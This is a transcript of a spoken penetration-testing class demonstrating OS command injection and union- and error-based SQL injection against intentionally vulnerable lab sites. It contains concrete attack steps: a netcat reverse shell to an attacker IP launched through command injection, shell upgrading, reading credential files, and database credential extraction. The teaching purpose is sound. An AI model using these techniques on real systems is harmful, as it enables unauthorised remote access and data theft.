Yes, so now we are going to see about OS command injection vulnerability. We can also see about a blind SQL injection and error-based SQL injection. And before that, I also tell you this OS command injection is a very rare vulnerability. But if any application which is vulnerable to OS command injection, then no one can able to secure the application. That much critical vulnerability it is. Okay, so we can exploit different security scenario of OS command injection. And we can also exploit the blind OS command injection also. Okay, now what I'm going to do is I'm going to choose OS command injection here. So yes, OS command injection and OS command injection blind. So first we can exploit OS command injection, then we can exploit for a blind. So first we'll choose with the security level of low. So the application server will allow the OS command to be run, so where it is possible for OS command injection. Okay, so here there is a search box like a search box. Is it possible to find the OS command injection in other search box, like just I'm opening this website? Okay, so is it possible to find OS command injection here? No. Okay, so wherever the application getting input from the user and processing from the OS level, then it is possible for the OS command injection. Okay, see, for example, now we will discuss about, we see this one. Okay, so here there is a general search box, and here also the application is getting input from the user. So I'm just searching for facebook.com. Okay, so here I'm searching for facebook.com. Now what happened? What it shows in a result? It shows that no result were found for the query facebook.com. Okay, so no result were found for the query facebook.com. Generally what it does in a backend, it takes input from the user as a reference, and it search in the resource whether if there is any resource available for facebook.com in backend or not. So if there is any resource means it provides the resource, else it shows that no result were found for the query facebook.com. So this is generally happening here. The system no need to take this input and make it as a functional level. But in case of pinging site, okay, so there are many sites in online having the functionality of pinging. So see, so pinging online, so this is the site. For example, here I'm just going to the site. Okay, so I'm going with a ping, and here also they're getting input from the user. So I'm just getting giving the host name like 127.0.0.1. There this application loopback address, and I'm giving the captcha. Let me make into go. Okay, it is not ping. So let me give some other IP address like facebook.com. So now what happening? It is making pinging to facebook.com. Okay, it sends 4 packet and receive 4 packet. It having 0% of packet loss. Okay, so whenever we giving this input in search box also we are giving a facebook.com, but it generally takes the input as a reference and search with the internal resource. But this application what it will do, it making pinging over the user input. See how it is generally happening. So generally how we can ping through the terminal only. Through the shell only we can able to make ping. So gently, I hope you all know what is operating system and application. That is very fundamental one. See why we are using operating system. Interaction with the system and human input. Generally, we need to make interact with hardwares. Okay, so for example, here I'm using this laptop. In this laptop, there is a hardware, a speaker, camera, mic, screen, everything will be hardware. So how I can use the speaker hardware, how I can use the mic hardware, how I can use the camera hardware using the operating system only. Okay, so if there is a general direct hardware as a speaker or a mic or a camera means we can't able to use that one. We need one operating system which control the hardware. So this is the reason we are using hardware. So here only the object kernel is presented. Okay, so software. So using the software only we can able to control the hardware. Okay, So in between the hardware and software, there is an agent called kernel is available, located. Okay, so this kernel is an agent which is in between hardware and software. So for example, if software wants to communicate with hardware, it communicates only through the kernel. Okay, and if the hardware should want to communicate with software, the same kernel only help us to communicate this to hardware and software. See, I'll give you the clear example for this kernel. Okay, see, there is a see here. One application is this. Yes, camera application. See, this camera application is a software. Okay, so this camera application is a software, and when I click the software, see what happened. When I'm opening the software, the actual camera hardware is got triggered. Okay, when I'm opening the software, the actual camera hardware got triggered. How it works? The camera software use kernel to communicate with camera hardware. So this is actually role of kernel. So have you understood what kernel means? So generally, camera is a software and also hardware. So when we click the camera software, this kernel will help us to trigger with camera hardware in system. The same thing, for example, in volume also. Okay, in volume we reduce speaker volume in by graphically in a mobile phone or in system graphically. So for example, here there is an option for a volume. So once we can able to increase or decrease the volume from here also. But even if we increase or decrease the volume, it will be replicate on the speaker hardware only. So if the video is playing, if I am increasing the volume, means what happened? The output will be displayed on the speaker hardware. How the software will communicate with hardware using kernel. Okay, and next one is shell. Okay, so shell is the agent in between user and kernel. So user, okay. So you know now what is kernel, what is the use of hardware and software. So this shell is the agent in between user and kernel. So like Windows command prompt and Linux terminal, these are the shells. Okay, so these shells are used to communicate with kernel. So for example, here I'm opening my terminal. Just say I'm doing one thing. And here we are the user, and this terminal is a shell. So what is the use of shell? It is in between user and kernel. So if I'm a user, I want to communicate with the terminal means, sorry, I want to communicate with the kernel means I need to use the shell as a intermediator. So this shell is an intermediator between me and kernel. So here I'm giving the command like sudo shutdown -h now. See now what happened? It makes the system into shutdown. Okay, so here I am the user. If I want to shut down the system means only kernel will do this process, because shutting down the system is the process of combining hardware and software. Okay, so I am the user, I am giving an instruction to kernel via shell. So this shell is an intermediate agent which communicate uh, user to kernel. And kernel is the agent in between hardware and software. We had discussed shell and kernel. Okay, so here we are. So what is the shell means? So you can able to easily understand. Shell is the simply it is a Windows terminal or a command prompt. These are the shells. Okay, so Windows command prompt and Linux terminal. So where you can execute the command, that is actually a shell. Okay, so here I'm opening this Linux terminal. See, this Linux terminal is a shell. Okay, and I am the user. So what is the previous command I had executed? I execute the command sudo shutdown -h now. So what this command generally will do to shut down the system? Okay, see, generally who makes the process of shutdown? Kernel only makes the process of shutdown. Okay, because this kernel only need to interact with software and hardware to making the system into shutdown. Okay, now I am the user. Okay, now we are the user, and we use this shell. Okay, we use this terminal to communicate with kernel. Okay, so this is actually shell. So using this shell, we give a command, and this shell take the command and instruct to the kernel. So kernel process the operation to shut down the system. So this is actually shell. Okay, in between user and kernel, we want to run what is the process running on the system. Like I'm just giving the command like process or process auxiliary. Now it's showing the process auxiliary. It is not a good security mechanism to display the process status in publicly, but this is my just VM machine. I'm not running any big process in this machine, so that is why I'm disclosing. See now this it's showing what is the process running in my system, and how much CPU memory it takes, how much process memory it takes. So these are all the hardware takings. Okay, now I am a user. I'm using this shell to communicate with kernel. So kernel providing this information, which process taking which kind of CPU memory in my system. Okay, so this is actually role of shell. So now what happens? See how the general pinging is working on. Okay, I'm going to this one, voice command injection hack. Okay, and also I'm going to the site for uh, okay, so I'm just going to the site, and also I'm taking another site for example, this demo.testfire.net. Okay, so this OS, honestly, this OS command injection is a very rare vulnerability. Okay, you can't find this vulnerability in most of the application, but if any application you are testing which is vulnerable to OS command injection, means that is highly risky application. Okay, that is highly risk to the application. No one can able to save the application if it is vulnerable to OS command injection. That much sensitive critical vulnerability this OS command injection have. Okay, see now they are getting input from the user. Okay, in this box they are getting input from the user. Now you have a question, so where we can perform this OS command injection from all the input place where the application is getting input from the user. See, I'm just going with the search box, and here I'm giving for facebook.com. Okay, now what happened, this search box generally take user input as a reference. Okay, it takes facebook.com as a reference, and checking with the internal resource. Okay, check with the internal resource. If any resource which is matched to facebook.com, then it display the resource, else it show like the no result were found for the query facebook.com. So this is the general thing this application will do. I'm i'm giving the same facebook.com in this application. See, see, when I'm giving facebook.com in this application, what happened? Even this application also doesn't have the resource like Facebook, doesn't have any resource related to Facebook. But this application doing something different. Okay, so this is actually pinging to the facebook.com and showing the result like packet transmitter, packet receive. For example, if you're having only mobile phone, if you want to ping something, is how you will do. In mobile phones there is a no shell is that, so like no command prompt or terminal available in a mobile phone. So that time you can go to the site online and you can give the host name and you can able to find the ping options here. So this is generally this application can do. See how generally the pinging will works. So we need to interact with the shell. Okay, so generally how we can perform pinging. So our system will send ICMP packet to the target. Okay, target host name or IP address, and if it receives the ICMP packet, then only it show the result like this. Okay, so generally it may be receiving or not receiving the packet. So generally our system will send ICMP packet from our system to the targeted host name. In pinging, our system will send ICMP packet to the target host name. Okay, so how our system is sending packet to the targeted host name? By the shell only. Okay, shell only process and initiate this. So let me just write a basic Python code for here. Okay, so just I'm writing a very basic Python script, so it will make you clearly understood what is actually happening in a background. So I'm just getting this input as host name as input from the user. So input underscore input. Okay, so and I'm getting the user input, I'm storing on the variable host name. Okay, and let me do something, and processing. What I'm doing is I'm just doing calling the subprocess module, subprocess.call. Inside the function I'm giving the command like ping. Okay, so ping, so you should have to mention it like a variable, sorry, like a string. So ping. And yesterday we had I said you about count now. So if you are testing our application, see now this application also only send 4 packet. Okay, only send 4 packet and receive 4 packet. So we have to set some count that will be good. So -c, I'm giving a count value, I'm giving it 3. And next I'm calling the variable host name. Okay, so this is a general ping command. So ping -c 3 and host name. So what is the host name user is giving? It making pinging here. So this is generally this application will do. Now I'm going to my desktop. This file is actually located in desktop. Making list. Yes. So here is a file. So I'm just calling the file python2 ping.py. Now what it asking? It asking to enter the host name. I'm entering the host name as a facebook.com. Okay. See now what happened. Now, oh, so in count we mentioned the count 3. So for example, we can mention for any count as per you want. This is the general thing. Okay. See, now once again asking for the host name. Now I'm giving a host name like a Google. See now what happening when user enter the host name, it taking the user input. Okay, now when user enter the host name, it taking the user input and process in the shell level. Okay, take it, getting user input and store it on the variable host name, and they processing like this. The exact same thing also work using in this application. This application also using the exact same thing. Okay, so when we are entering the host name, they store in any host name like a facebook.com or google.com, that will be stored in this variable, and they calling this variable, and they process everything in the shell level. Okay, because in shell level only we can able to make process. Okay, so generally for a print itself we can able to do generally, but for sending packet, this subprocess model we are using. So if you are familiar or good with python, you can some modules like OS module. So why means if you want to execute something in a terminal, then you have to import the module or OS. Okay, if you want to execute something, if you want to print something in a terminal, means you do not need to import any special module. But if you want to make something execute, now this ping command is only execute on the terminal. We can't able to execute this ping command other than many terminals. Okay, now what we need to do, we need to execute this command in a terminal. So there is a two very famous module in python is available. One is OS module, another one is subprocess module. Just for a change, I'm using a subprocess module here. Okay, what this subprocess module will do, this take an input from the user and processing from the shell level. Okay, take input from the user and process from the shell level, then only it can able to make a ping, otherwise it can't able to make ping. See, now have you understood how this application is working? Now it is asking for ping. Now I'm just giving like facebook.com here also, and I'm making a lookup. See now what happening, it's showing IP address of Facebook like 157.240.192.35. Okay, so either maybe address may be different, we can ignore that part. Okay, now you need to understand one thing, what are all the input given by the user here will be processed by the shell. Okay, see in general search box. Okay, see in this general search box, if we give any input, means it takes that input as a reference and check with the internal resource. If there is any resource available, then it display the result. That's all. It never processing the user input in the terminal level. For example, if I'm giving a facebook.com, means it never process this facebook.com. Okay, so if we give like a facebook.com, means it never process the facebook.com, it only check this, it only take the facebook.com as a reference and check whether any resources are available for facebook.com or not. That's all it can do. But see here, if user give any input means it not take it as a reference. Instead of that, it make process in the system level. Okay, in this particular input location, it gets input from the user and process from the system level. Like in this here also, how they're getting the same it processing in the shell level only. So what we need to do is see now what are all the informations. Okay, so what are all the data we are entering in this box will be processed by the terminal. Yes, okay. So what information if you're giving like a google.com, so google.com, so if we give google.com, means this google.com is processed by the terminal. Okay, so name google.com address equal to this is the address. Okay, so it is processed by the terminal, take user input and make the same process what we build in a python, and it execute in a terminal one thing. So now what have it risk in this means, see if it is a proper application means here also it needs to validate the user input. But if this application will fail to validate the user input means that may leads to the os command injection. See for example in linux. Okay, I'm just opening my terminal. What I'm going to do is first I'm pinging facebook.com. So ping alpha c facebook.com count for facebook.com. Okay, so generally this is how the backend will be working on. So now this facebook.com they're getting input from the user. Okay, so this facebook.com they're getting input from the user. Rest everything is same. Okay, so what are the facebook input you're giving? Like if you give facebook.com here means it will be look like this. Okay, they process like this only. Okay, now what I am going to do is now here I am entering the input facebook.com. Along with the facebook.com, if you want to execute one more command in a terminal, okay, one more command in a same line means, then what we will do, we will give this double and symbol. Okay, we'll give this double and symbol and we give the next command. Okay, so for example, now see I am in a root home directory. Okay, and I'm just showing my desktop location. Okay, so here there is only one folder called one. Now I'm creating another folder called demo. Okay, so first I need to create the demo folder in my desktop. So first what I need to do, I have to go for my desktop location. Okay, so cd desktop. Okay, and now what I am doing is I am giving and make directory demo. Okay, so first this command will go to the desktop folder, and in the desktop folder this command will execute next. Okay, it create demo folder, and once after executing this command, it this cd demo will get inside the demo folder, and inside the demo folder we are creating a file. Okay, so these four are different commands, but we are executing all these four commands in a single line. See now I'm running the command, executing the command. Now the demo folder is created in a desktop, and here there is a file also created. How we perform this everything in a single command. Okay, the same thing OS command injection also will do. See here I'm pinging facebook.com and I'm giving this and ls. Okay, see what happening. Okay, so first it pinging facebook.com and next see it showing a ls in a file. Okay, so we are in a demo folder now, so that is why inside the demo folder there is a file.txt file, it listing the file. Okay, so I'm just going with my home directory and I'm executing here. Now it will be clearly I understood. Okay, see what happened. First it pinging, it sent four pinging to the facebook.com. Once after this four pinging to the facebook.com, what it makes, it execute the ls command, and this is the output for the ls command. Okay, here I'm going to do the same thing. Okay, so here I'm checking facebook.com. So this bwap is a remote server. Okay, so remote application. So I'm just pinging facebook.in. Okay, and I'm giving the and. Okay, so this and will help us to execute another command in the same line. Here I'm giving ls. Okay, see what happened. Now it execute the facebook.com address, it pingings. Once after pinging, it execute the ls command. Okay, so this is the output of ls command. Can I able to understand this one? This is actually output for the ls command. Okay, now what happening here, there is a no proper input validation. So what are all the input given by the user in this particular place will be processed in the terminal. So in logic wise, we can use double and symbol for executing another command in the same line. So we are using the same and we are giving a new command like ls. So for example, see, now instead of ls I'm giving who am I. Okay, so this whoam is a command to find our user. Okay, it's showing www-data. So we are a very low privilege www-data user in our system, exactly like this. Okay, see, we are giving a facebook.com and who am I. Okay, so first it pings the facebook.com and next it execute the command who am I and showing the result here. Okay, the exact same thing will happening here also. So they are getting input from the user and process from the shell level, but they are not properly validating the user input. So user can able to execute any command in a remote server. Are you clear? Now user can execute any command in a remote server. For example, if I want to create any folder or if I want to do anything in a remote server, from here itself I can able to execute the command. Okay, so this is actually OS command injection. So for example, if OS command injection available on our application is generally attacker take reversal using this vulnerability. So what I'm doing is for just listening through netcat and I'm listening on the port number 5656. Now I'm doing the same. Okay, I'm going to the targeted website. So this is why yesterday I take a netcat is very important for you. Okay, so facebook.com, before that we need to make sure whether the targeted application having the remote application having netcat installed or not. If the remote application having a netcat, then only we can able to gain a shell over netcat. If it doesn't have a netcat, then we can't able to gain a shell. Okay, so first I'm executing the command which nc. So first facebook.com and I'm executing the command which nc. See, now it execute the pings. Once after ping, it execute the command which nc is showing /bin/nc. So the netcat is available on target web server. Okay, so the same I am doing. Okay, so using this netcat, we take a reversion. So netcat and attacker IP address 192.168.0.116 and attacker is listening on port number 5656. Okay, 5656 and next we are going to use -e option and I'm giving /bin/bash. See, now still it is loading and I'm going to the terminal wise. We got the connection. Okay, so here I'm giving who am I. It's showing www-data. I'm just giving the command ifconfig. Okay, so IPA. Yes. Okay, so this is the IP address of target machine. 108 is belongs to BWAP machine. So we got the remote access. Okay, so this is also remote code execution. So you can perform remote code execution by via OS command injection. So if you found OS command injection, through the OS command injection, you can able to perform the remote code execution also, and you can able to gain the reversion. So now we gain reversal over this vulnerability. So if you want to get shell like this means, then yesterday we had discussed about the same. You have to give the Python PTY module. Okay, so Python 3-c import pty semicolon pty dot span, and here you can mention any shell as per you want. Okay, so I'm mentioning a shell bin bash. Okay, if you want zsh or c shell, any shell you can mention as per you want. Okay, so I think maybe python 3 is not available in this bwap. Okay, we got the shell like www-data. So we are the user www-data. This is a very low privilege user and the machine. Okay, but we got the access. Now if there is any configuration based vulnerability means attacker utilize take advantage the configuration based vulnerability to make a privilege escalation. Okay, so term environment linux variables not set. So you can give the command like export Now the Linux environment will be completely set up to this machine. So here I'm execute the first, because of first when we execute the command clear, it is not executing because Linux environment is not set up. Now we successfully set up the Linux environment. Now I'm executing clear command. Yes, it is working. Now you can give any Linux command as per you want. Okay, so I hope you guys will understand what does it means. So I'm just going with the file system. So I'm just checking with uh, /etc making list. So I'm just trying to get password. Yes, this is password file, and I'm checking privilege of the file like ls-pl password. Okay, so having read for permission for all the user. Okay, the same you can do like ls-l for shadow file. Okay, so only owner is a root user having a read write permission, and the user belongs to root group shadow group. The users belong to shadow group have the read permission, and other user doesn't have any permission in this file. Okay, so if there is a configuration like a shadow file having a write permission means you can directly change the password, or password file having the write permission means you can change the uh, user ID and group ID as well. So last day we take I try to complete the topics in like 2 hours in last day, and for the next 2 hours we take it as a buffer. Okay, in that we'll discuss about privilege escalation and buffer overflow, because some of you asked buffer overflow also. Even that is not web application part, but we'll discuss about it, how you can perform buffer overflow and exploit development, malware analyst, and reverse engineering. So I'll give you some basic idea about how you can do this also. Okay, so this is how attacker will take advantage over the OS command injection. Okay, team. So this is why OS command injections are very critical web application-based vulnerability. See, if you exploit anything in a network wise, then it will be issued in a production server. See, for example, if you are doing a web application, real-time web application penetration testing, if you found the application is vulnerable to SQL injection or a cross-site scripting or a LFA or a ICS or a SSR, any vulnerability, the client will ask the POC to exploit. Okay, so the client will ask you to exploit and show the exact whether it is vulnerable or a false positive. But in network penetration testing, no client will allow you to exploit, because once you exploit anything in a network wise, it will be produce the damage in the production server wise. See, now we make a remote code execution. Whenever I'm refreshing the server, see what happened, it is not loading. Okay, so we have to restart this bwap once again. So this is why when you are performing network penetration testing, even if you find there is any vulnerability or anything in the internal network, you no need to exploit the vulnerability. Okay, instead of that you can ask with your client. Okay, so you can ask that with your client, because if you exploit something in a network pen testing, that will be replicable in the production server. That makes a huge issue. Okay, because one time in my testing I was exploited something in the network. That time when I was joining as a security net, it is 3 years back. So I exploited the service. So the service and the production server is totally getting down. The same exact thing what this application is doing, that it has happened in 3 years before. So that time we make apologies and they're starting all the servers once again. So that is why when you are doing a network pen testing, don't make exploit. Just wait it restarting. And now we are going to see about blind SQL injection. Okay, so now we are going to see about blind SQL injection. So we can see about error-based SQL injection also. Okay, because in last time we only discussed about union-based SQL injection, right? So we take one complete day for SQL injection. In that day, we had discussed about two scenarios. One is authentication bypass, another one is extracting data. Okay, so one complete day we take it for a SQL injection. In that day, we had discussed about two scenario. One is for authentication bypass, another one is for extracting data from the database. Okay, so authentication bypass we have discussed, and extracting data from the database we say that there is a three types are there. Okay, one is union based, next error based, and next one is blind based. So we only exploit union based SQL injection, and after that I'll tell you how to use the tool SQL map. Okay, but I never tell you that error based or blind SQL injection, because that time the participants also very low, the time also almost ended, so that is why I ignore those topics. I'll show you some secrets also. It's not a secret, some very powerful and very easy tool for exploiting SQL injections also. Okay, so for performing or extracting data in the database, what you need to do? So first we need to find SQL parameter of the applications. Okay, so using the SQL parameters only we can able to go for the parameter based error balancing. So first I'm going with this application, it is php.vulnerable.net, and I'm searching whether there is any SQL parameter is passing or not. Yes, so here there is a SQL parameter cat equal to 1 is passing. Okay, so we found this parameter and I'm using this add-on hackbar here for this exploitation scenario. Okay, so now see guys, now we got find this parameter which having is we got find this SQL parameter, and next thing what we need to do, we need to do for a error balancing. In last session we had exploited the SQL injection in a union based, now we are going to exploit the same in error based. Okay, I'll tell you the difference between union and error based. See first where you can perform the union based SQL injection means wherever in the application, what are all the application have using a union operators, okay, or union statement like select. Okay, so these are the union statement. If the application using union statement in a backend, then you can perform union based SQL injection. But if some of the developer will not use any union based function, means that you can't able to find the union based SQL injection. First, I'll tell you the advantage of union-based SQL injection. See, if there is a thousand data available in the database, means if you found union-based SQL injection, if you exploited union-based SQL injection in the application, you can get all the thousand data in a single shot. Okay, if that you can get all the data, not even a thousand. So how much data it having more than a 10 lakh data? Yes, you can able to get all the 1 million data in a single shot in union based SQL injection. That is the very advantage of union based. If you go for error based SQL injection, you can able to get only one data in a single in a same time. Okay, so if you want to go for the next data, then you have to give the another result. Okay, that is the little disadvantage in a error based. Okay, in union based you can get all the data in a single shot, you can get all the dumps in a single shot, but in error based you can able to get only one data in a one time. Okay, if you want another data you have to process it for again. So this is disadvantage in a error based. And even if it is a blind based SQL injection, means you need to find each and every letter for one time you get only one letter of the database name or data name. That is literally difficult, but you need to aware of how the time based and boolean based in blind also working. Let us we discuss. Okay, so first I'm making error balancing here. Yes, now we perform error balancing. So before going to exploit error based, once again we can exploit the application in union based SQL injection. Okay, so here I'm giving the payload like column count. It is very important to find the column count. Okay, so here I'm giving order by 1. Yes, now it is successfully loading, and I'm giving order by 10. See, when we are giving order by 10, it's showing some error. Okay, when we are giving order by 10, it's showing some error. So like any some MySQL errors at all. Okay, so I'm giving a 5. See, for 5 it is loading. Okay, so I'm just giving an 8. See, when we are giving 8 it is working, when we are giving 10 it is not working. Okay, so I'm giving a 9. See, 9 also working, and 10 is not working, so the total number of column may be 9. So I'm checking with 11 also. One second. Yes, 11 is working actually. I don't know why 10 is not working. See, you can check it again. Yes, now it is working. Okay, so we can do once again. So 1 is working, and whenever we give 10, it is working. Okay, now I'm giving 100. See, when we give 100, it is not working. 10 is working, 100 is not working. So the number of column is between 10 and 100. So instead of 100, I'm giving a 50 and making execute. Okay. See, 50 also not working. Okay, 50 also not working. So what I'm doing is I'm just giving 30. See, 30 also not working. 10 is working and 30 is not working. So the total number of column is between 10 and 30. So here I'm giving a 20. See, this 20 also not working. So the total number of column is between 10 and 20. So I'm giving a 15 here, making execute. See, even this 15 also not working. So the total number of column is in between 15 and 20. Sorry, 10 and 15. Okay, 10 is working and 15 is not working. So the total number of column is between 10 and 14 because 15 is not working. So I'm giving a 12. See, even this 12 is not working. Okay, even this 12 is not working. 10 is working. So I'm just giving 11. See, when we are giving 11, it is working, but when we goes for a 12, it is not working. Okay, so now the total number of column is 11. If you give any number lesser than 11, then it works. Okay, so for example, I'm giving a 6 here. Okay, yes, it is working for 6 also. So any number lesser than 11, if you give, it will work. If you give number more than 11, it won't work. So we found the total number of column used in this application is 11. Okay, so I'm just splitting this URL, so which is easy to identify the payloads. So now I'm giving the union statements for int and I'm giving the total column we found is 11 and I'm making execute. See, now you just search for any number from 1 to 11 is unnecessarily displaying in the application or not. Okay, see, now this number 7, 2 and 9, these are the unnecessary numbers displaying in the application. So for example, I'll make a confirm whether these are unnecessary numbers or not. So in the place of 2, I'm giving a 22. In place of 7, I'm giving a 77. And in place of 9, I'm giving 99. Just for example, you can give any number for your reference. Just for example, I'm giving these numbers and I'm executing again. See, now all the numbers are updated. Okay, now all the numbers are updated. Even I'm checking this 3, but this 3 is not same because it is combined with this. But the 7, okay, so which means these numbers are not vulnerable, but the location where these numbers are presented is vulnerable, which means this 22 or 2 is not vulnerable. The location or place where this 2 is located is vulnerable. Okay, so for example, why we need to find the vulnerable point means, see, in this SQL injection, what we are going to do, we are going to extract the information from the database. So if we are extracting information from the database, then what happened? It disclosed the internal information in the web page itself. Okay, disclose the internal information in the web page itself. In that web page, where it needs to disclose the information. That is our point. Okay, inside the web page where it's need to disclose the information, that is our point. So we can make it disclosing in this place of 7. So if we give the payload in the point of 7, okay, that in this application disclose all the information in this place. If you give the payload in this location of 2, then it disclose all the information in the place of 2. So last time we have give payload in the location of 7. Now for a change we can give payload in the location of 2. Okay, so I'm making a basic SQL statement to find user, database, and version, and I'm making execute. See, now in the place of 2, it disclosing the information like user, database, and version. So I'm copying these informations and I'll paste it on here. So this acquired at localhost is a user, and this acquired is a database, and this is the version of database. Okay, now I'm just removing this function and I'm going to find database name. Okay, so we already got the database name is acquired, but once again, if you want to check, you can check it again also. Okay, making execute. See, now it's showing two database name. One is information schema, another one is acquired. So this information schema is a metadata server. So in last session, in the SQL injection server session itself, I had discussed, I tell you that what is metadata server. So this information schema is not actually it is not an actual database. This is a database holding metadatas. Okay, so now I'm checking for a columns and it asking the database name. The database name is Quad, and I'm making execute. See, now it is closing the columns. Okay, what are all the columns available in the Quad database? Okay, yes, these are the columns available in the Quad database. In attacker perspective, attacker will mostly prefer this column users to get information. Okay, because all the user related information will be stored in this user column only. So what I am doing is I am going to find what are all the tables. Okay, okay, so we found tables. Okay, so this uses this, everything is a tables, not a column, sorry. Okay, these are the tables available in the Acquired database. Okay, so this Acquired, this application having only one database. If it is a big application means then it have a two or three or based on application business logic, they use database as much they want. Okay, so these are the tables inside the Acquired database. Now we are going to extract this user table. So we need to find what are all the columns inside the user table. Okay, so I'm just selecting this one and I'm going for a column and it's asking for the table name. So I'm giving the table name users. So you have to give the exact spelling. Okay, if you give like user without s means it won't work because in actual table it having the username users. And I'm making execute. See, now disclosing the columns inside the user table. Okay, so I'm copying this everything and paste it over here. Okay, so these are all the columns available in the user table. So now we found the username, database name, table name, and column name. So we need to extract. So next is our target is to get the data inside the each and every columns. So it asking the database name once again. I'm giving the database name Aqua and table name users, and you can mention what all the columns you want. So for example, here I'm mentioning the column uname. Now this demo application having only one user account. Okay, but in real time scenario you can get all the data because this is a union based SQL injection we are performing, so we can get most of the data. So this is a username and this is email it's showing and this test is a password. Okay, so this is how you can perform for the union based SQL injection. It is a very easy one, and the very important thing in union based SQL injection is the very advantage is you can get all the data in a single shot. That is the very advantage of union based SQL injection. Now we are going to perform the error based SQL injection. Okay, see, in union based we get all the data in a single shot, but I'm going with error based now. Okay, so I'm going with error based XPath extract value. So I'm just giving the version. I'm just checking the version what it have and making execute. See, now it's showing error. The very in error-based SQL injection, you no need to find the vulnerable location where it have to disclose the data. Generally, in error-based SQL injection, it throwing the SQL error along with the errors. Attacker trick the application to throw the internal information also. See, now generally it's showing the SQL errors. So along with the error, it also showing the version. Okay, so attacker taking advantages over the error to get the internal sensitive information. So yes, we got the information. Now what is the version it have using? And next I'm using the same command. Okay, I'm just giving an enter here. Tables. Okay, and I'm making execute. Yes, so it showing error. Along with the error, it also showing each and every table. So first table is artist. So I'm copying the table name and put it over here. Okay. Yes. But in union based, it shows all the data in a single shot. But in error based, it shows only one data in a same time. If you want to get another data, then you can extend the limit. Okay, see here you can able to find the limit option. So here you can change the limit 0 comma 1. Now I am changing to 1 comma 1. It will show the next data. It will show the next table. Okay, next table is cards. So I'm just copying this table and paste over here. Okay, so I'm entering the value again. 2 comma 1. Yes, now it is category, and I'm once again I'm making extending the limit. Okay, now 4 comma 1 guest book. So you can copy all the information and store it safely. Okay, so even if you are performing is in a live application, you collect the information and store, because most people will not store, they just see everything. That is not proper. If in a proper penetration testing, you have to disclose all the information. You have to give all the information what all the data's application making disclosing. Okay, so pictures, but it will be look like some boring. Okay, because for every data we have to give it in manually. It doesn't show all the data in a single shot. For a one time, it shows only one data. Products. And next one, 7. This is the table 7 users. So I'm copying the table and paste on here. Yes. Okay. Mm, so 8 comma 1. See, for this 8 comma 1, it doesn't show anything, which means the total number of table is exceeded. So these are the total number of tables available in the database. Now I'm going to find the columns. Okay. So it asking the database name. I'm giving database name Aquat, and it asking the table name. I'm giving the table name users. See, now prepare the query and I'm making execute. See, now it's showing the columns inside the table users, inside the users table. You name, and you have to do the same as well. Okay, you need to extend the limit. So 0 comma 1. Now I'm giving 1 comma 1. Yes, it is pass. I'm just copying this one. Okay, so again I'm extending the limit 2 comma 1. Three comma one. And next 4 comma 1. Email. And 5 comma 1. Name. And 6 comma 1. Phone. And 7 comma 1. Card. And I'm giving next 8 comma 1. C. Okay, it doesn't show anything. So there are the total number of column is exceeded. That's all. Okay, so this is how you can perform error-based SQL injection. So you can able to get only one data at the same time. Now we get the table name, column name, and so finally we can go to get the data. So it asking the database name. Once again, I'm giving the database name Aqua and table name users and columns. I'm giving the column uname and password, uname comma pass. So this is the column they have using, not username or password. They're using the column uname pass. Okay. So this is the first username and password. So if you want to get a next username password, you have to do the same thing. You have to change the limit value. Okay. So from 0 comma 1 to next 1 comma 1 and 2 comma 1. So I hope you guys will get it how it is working. So the general error balancing mechanism what we discussed in union based in the previous class also same. Everything will be same, but the method of extraction is different. Okay, in error based or union based or a blind based, the finding SQL injection is same, but the method of extracting the data is different. In union based, we easily get all the data in a single shot, but in error based, we get only one data in a one time. Okay, so for example, if we want a next data, we have to go for a next. Okay, the same thing, but the thing will be different in a blind SQL injection. So now the time is 9:50, so we can take a 10 minutes break. We'll be connect by 10 o'clock and we'll discuss about blind SQL injection and blind OS command injection. Sorry, I failed to tell you that blind OS command injection. So once after this break, we can see about blind SQL injection, blind OS command injection. And please remind me, I'll suggest you one very best tool for making SQL injection automatically. Okay, even it is more easier than SQL map also. Blind SQL injection. Okay, so this blind SQL injection is quite different, and it is totally in real time scenario. It is really very less time only you can able to face the blind SQL injection. This is not a very familiar vulnerability. Okay, only sometimes it is, and it is exactly a rare vulnerability, blind SQL injection. But you need to make aware of how this blind SQL injection is working on. By this off, okay, so exactly like, so if I'm doing a bug bounty or a penetration testing to an application means how I make an approach. So I'll just share you everything in a practically by next week in live application. Why I'm telling you all this vulnerability in a low application means because it is really hard to find all the vulnerabilities in live application. Okay, so for example, if we are testing a vulnerabilities in live application means we take one complete session, not one, even two complete sessions to find one actual vulnerability. So once we found how these vulnerabilities are working, like how OS command injection, file upload, LFI, RFI, CSRF, SSRF, XSS, SQL injection, rate limit, how it all working means, then we can use this knowledge to get approached over the live application. Okay.